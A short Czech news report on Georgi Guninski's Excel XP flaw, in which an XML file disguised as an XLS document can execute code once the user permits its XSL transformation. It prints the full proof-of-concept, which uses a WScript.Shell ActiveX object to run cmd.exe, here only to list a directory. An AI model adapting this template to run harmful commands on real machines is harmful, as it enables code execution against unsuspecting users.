Světoznámý objevitel bezpečnostních chyb převážně v produktech Microsoftu, Georgi Guninsky z Bulharska našel další.
Chyba se týká programu Microsoft Excel XP, kdy při pokusu otevřít XML soubor maskovaný za excelovský XLS dokument může dojít k vykonání jakéhokoliv kódu na vašem počítači. XML (Extensible Markup Language) je značkovací jazyk určený především pro popis obsahu dokumentu. Pokud je takovýto soubor otevřen v Excelu XP jste dotázání zda se má dokument zobrazit podle XSL (Extensible StyleSheet Language). Standardně je vybrána volba NE, ale pokud povolíte zobrazení podle transformace určené v XSL je útočníkův kód vykonán.
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="#?m$ux" ?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl">
<xsl:script>
<![CDATA[
x=new ActiveXObject("WScript.Shell");
x.Run("%systemroot%\\SYSTEM32\\CMD.EXE /C DIR C:\\ /a /p /s");
]]>
</xsl:script>
<msux>
msux
written by georgi guninski
</msux>
</xsl:stylesheet>
Opět je využito objektu ActiveX. Jak vidíte zápis je opravdu jednoduchý, ale přesto může napáchat hodně škod. Dejte proto pozor, jaký to soubor otvíráte, protože oprava zatím neexistuje.
Zdroj: Georgi Guninski